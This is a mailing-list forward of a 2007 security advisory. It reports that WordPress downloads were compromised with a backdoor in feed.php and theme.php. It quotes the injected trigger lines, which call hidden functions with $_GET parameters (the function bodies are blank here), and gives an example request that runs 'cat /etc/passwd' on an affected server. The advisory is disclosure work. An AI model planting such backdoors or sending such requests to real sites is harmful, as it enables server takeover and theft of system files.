[wp-hackers] FW: WordPress source code compromised to enable remote code execution

Ross M. W. Bennetts ross.bennetts at une.edu.au
Sun Mar 4 23:49:39 GMT 2007

-----Original Message-----
From: ifsecure at gmail.com [mailto:ifsecure at gmail.com] 
Sent: Saturday, 3 March 2007 7:04 PM
To: bugtraq at securityfocus.com
Subject: WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blog creation software,
I have discovered that it's source code has recently been compromised by a
third party in order to enable remote command execution on the machines
running affected versions. The compromised files are wp-includes/feed.php
and wp-includes/theme.php. 
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {


if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

in wp-includes/theme.php

function get_theme_mcommand($mcds) {


if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

this would enable remote command execution on machines running compromised
versions, for example

http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd

I have discovered this vulnerability on Friday, March 2nd 2007 and contacted
WordPress about it straight away. They reacted promptly by disabling
downloads until further investigation. Later they determined that ony one of
two servers has been compromised and that the two files mentioned above are
the only ones changed.

It seems that the above files were changed on Feb 25th, 2007, so if you
downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible
that you are running a compromised version, so be sure to check for the
above code.

Discovered and reported by Ivan Fratric

Thanks to Ryan Boren of WordPress for quick response and his feedback
regarding this issue.

More information about the wp-hackers mailing list